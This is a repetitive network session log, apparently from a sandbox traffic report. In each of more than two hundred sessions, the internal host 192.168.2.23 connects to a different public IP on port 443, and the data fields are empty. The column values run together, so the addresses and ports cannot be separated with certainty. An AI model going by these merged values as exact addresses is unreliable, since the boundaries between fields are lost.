                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16841192.168.2.2333144123.52.195.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16842192.168.2.2343106159.9.73.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16843192.168.2.2343726122.99.75.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16844192.168.2.2350670105.129.79.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16845192.168.2.235986636.3.185.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16846192.168.2.2341862125.57.252.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16847192.168.2.2355752200.106.230.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16848192.168.2.235301434.89.225.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16849192.168.2.2356178115.159.3.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16850192.168.2.2343542125.166.204.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16851192.168.2.2349984190.240.35.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16852192.168.2.234225491.204.114.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16853192.168.2.2356544186.43.73.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16854192.168.2.2355004138.149.116.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16855192.168.2.2343614145.182.17.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16856192.168.2.2339594161.155.158.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16857192.168.2.2358294134.123.37.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16858192.168.2.2359856176.90.9.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16859192.168.2.234760859.131.145.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16860192.168.2.2334558176.197.169.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16861192.168.2.2333674177.71.255.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16862192.168.2.2332922211.109.28.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16863192.168.2.234652679.163.213.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16864192.168.2.2345244177.137.87.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16865192.168.2.2339870199.22.200.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16866192.168.2.235402693.19.70.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16867192.168.2.2354802221.144.191.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16868192.168.2.2352372168.250.12.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16869192.168.2.234716817.114.49.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16870192.168.2.2346014167.36.38.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16871192.168.2.2339714101.191.129.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16872192.168.2.2342192220.231.33.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16873192.168.2.2358652208.167.124.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16874192.168.2.233608424.147.26.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16875192.168.2.23593969.151.247.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16876192.168.2.2348800221.48.225.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16877192.168.2.234651496.83.23.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16878192.168.2.234128037.32.178.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16879192.168.2.2353564168.185.125.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16880192.168.2.2354922174.16.168.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16881192.168.2.235370467.190.151.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16882192.168.2.2333224131.180.116.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16883192.168.2.2348292103.173.140.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16884192.168.2.2338876161.182.193.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16885192.168.2.2349898176.164.227.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16886192.168.2.235498823.65.231.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16887192.168.2.2354364140.133.33.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16888192.168.2.2343888219.43.104.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16889192.168.2.2342576164.29.213.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16890192.168.2.234020648.144.52.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16891192.168.2.2345244196.76.218.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16892192.168.2.2345478193.44.55.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16893192.168.2.234956263.254.106.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16894192.168.2.2349236153.130.132.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16895192.168.2.2342068134.86.159.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16896192.168.2.233384081.83.172.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16897192.168.2.2343076156.23.17.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16898192.168.2.235407658.91.21.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16899192.168.2.2342846150.42.126.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16900192.168.2.2338896148.15.130.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16901192.168.2.234090614.144.218.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16902192.168.2.2356212163.169.75.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16903192.168.2.2359558212.146.177.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16904192.168.2.233594620.50.104.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16905192.168.2.2353820153.193.250.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16906192.168.2.233435439.199.234.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16907192.168.2.235762476.131.189.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16908192.168.2.236049286.92.56.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16909192.168.2.2346718153.123.238.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16910192.168.2.235269678.26.81.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16911192.168.2.2339302165.155.239.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16912192.168.2.233623690.170.185.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16913192.168.2.234873662.220.94.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16914192.168.2.235533299.216.100.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16915192.168.2.2350024164.32.195.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16916192.168.2.2340408113.0.155.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16917192.168.2.2339496165.200.72.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16918192.168.2.2343828158.178.203.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16919192.168.2.234426627.28.87.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16920192.168.2.2350106174.197.28.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16921192.168.2.2350090119.122.35.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16922192.168.2.2335814134.67.84.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16923192.168.2.233635662.119.138.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16924192.168.2.23367724.65.31.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16925192.168.2.2338414198.71.32.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16926192.168.2.2339946114.216.188.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16927192.168.2.2358838220.90.3.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16928192.168.2.235995863.218.104.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16929192.168.2.2334980194.112.65.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16930192.168.2.2334332192.179.62.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16931192.168.2.2332798121.155.161.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16932192.168.2.2344456103.248.101.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16933192.168.2.2336648183.14.192.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16934192.168.2.2333680117.231.190.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16935192.168.2.2333498178.64.2.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16936192.168.2.2338350182.244.10.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16937192.168.2.2352070205.215.0.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16938192.168.2.234450299.213.210.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16939192.168.2.234938873.11.42.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16940192.168.2.2343106115.47.164.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16941192.168.2.2334244208.194.226.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16942192.168.2.234151667.103.209.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16943192.168.2.2359798220.216.7.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16944192.168.2.2347366111.80.147.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16945192.168.2.235724662.100.181.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16946192.168.2.2338608179.95.65.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16947192.168.2.233374670.180.149.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16948192.168.2.234906440.61.89.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16949192.168.2.2333062112.204.106.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16950192.168.2.2355222220.178.220.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16951192.168.2.2354230121.223.43.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16952192.168.2.235568843.202.93.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16953192.168.2.2345820106.65.151.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16954192.168.2.235124254.206.41.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16955192.168.2.235005098.18.216.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16956192.168.2.2340534146.196.44.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16957192.168.2.235863290.88.4.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16958192.168.2.2344216139.128.216.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16959192.168.2.2353216107.88.34.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16960192.168.2.235171635.234.53.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16961192.168.2.2339000188.94.147.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16962192.168.2.2337390205.15.154.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16963192.168.2.2335378144.42.230.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16964192.168.2.2336896199.53.187.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16965192.168.2.233886220.99.251.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16966192.168.2.2347148209.162.72.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16967192.168.2.233312269.118.172.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16968192.168.2.234361858.82.56.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16969192.168.2.233404635.35.231.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16970192.168.2.235231077.199.60.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16971192.168.2.234323859.153.39.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16972192.168.2.235401649.39.138.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16973192.168.2.235971066.34.74.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16974192.168.2.2334792151.121.13.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16975192.168.2.2350778172.226.229.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16976192.168.2.235112657.19.22.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16977192.168.2.2346756170.71.108.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16978192.168.2.235258246.193.65.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16979192.168.2.2341398118.218.17.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16980192.168.2.2343876110.243.225.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16981192.168.2.2358462182.39.179.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16982192.168.2.2341928221.145.68.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16983192.168.2.235478023.42.25.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16984192.168.2.236078612.80.44.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16985192.168.2.2336406166.63.243.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16986192.168.2.234137464.181.160.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16987192.168.2.2355780158.198.106.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16988192.168.2.233560649.132.86.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16989192.168.2.2334972210.121.199.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16990192.168.2.234613039.203.195.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16991192.168.2.2346944205.138.253.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16992192.168.2.2333060178.46.127.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16993192.168.2.2347176100.218.253.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16994192.168.2.2360378114.47.146.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16995192.168.2.233978253.73.63.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16996192.168.2.233505095.30.234.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16997192.168.2.2333850182.236.62.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16998192.168.2.2350840122.204.176.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16999192.168.2.2358930132.26.204.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17000192.168.2.2355408154.42.73.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17001192.168.2.234079640.60.101.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17002192.168.2.2333762180.120.97.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17003192.168.2.235456244.234.104.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17004192.168.2.2359104199.186.226.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17005192.168.2.2353822217.178.202.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17006192.168.2.2340566216.62.188.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17007192.168.2.235598092.140.118.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17008192.168.2.23437869.17.148.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17009192.168.2.2343174145.174.227.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17010192.168.2.2341922216.26.225.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17011192.168.2.23417861.244.183.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17012192.168.2.234722449.150.107.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17013192.168.2.2353448109.15.86.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17014192.168.2.2350278117.60.175.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17015192.168.2.234970074.23.97.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17016192.168.2.2333634174.249.190.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17017192.168.2.2350942171.14.200.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17018192.168.2.235756261.107.162.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17019192.168.2.2358298210.190.40.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17020192.168.2.234994657.158.11.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17021192.168.2.2347584122.232.234.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17022192.168.2.2350418159.162.29.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17023192.168.2.233492818.8.158.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17024192.168.2.234918877.66.169.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17025192.168.2.2355152125.40.154.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17026192.168.2.234231463.54.163.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17027192.168.2.233321479.151.50.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17028192.168.2.2360544202.218.24.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17029192.168.2.2341072130.106.127.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17030192.168.2.2343926125.187.81.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17031192.168.2.2337564132.89.52.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17032192.168.2.2354082182.84.250.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17033192.168.2.235244280.115.245.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17034192.168.2.235778691.233.34.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17035192.168.2.2344758175.178.102.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17036192.168.2.235137244.34.4.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17037192.168.2.2350428135.74.59.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17038192.168.2.235395099.244.30.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17039192.168.2.2345964217.65.246.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17040192.168.2.233731494.175.148.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17041192.168.2.235327480.167.115.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17042192.168.2.2343588146.141.146.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17043192.168.2.2348450206.157.120.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17044192.168.2.23599022.159.140.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17045192.168.2.2346928182.254.60.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17046192.168.2.2339618187.124.26.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17047192.168.2.2344498117.78.89.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17048192.168.2.233354653.169.20.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17049192.168.2.2357160119.60.122.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17050192.168.2.2348062112.87.24.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17051192.168.2.2341436179.119.90.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17052192.168.2.2348020101.152.81.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17053192.168.2.235077225.112.126.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17054192.168.2.2338204189.192.206.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17055192.168.2.2359554213.178.105.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17056192.168.2.2341986149.195.67.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17057192.168.2.234024645.196.78.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17058192.168.2.2340888211.153.95.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17059192.168.2.23377008.208.243.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17060192.168.2.233666813.62.108.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17061192.168.2.234711665.253.34.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17062192.168.2.234314885.238.110.210443
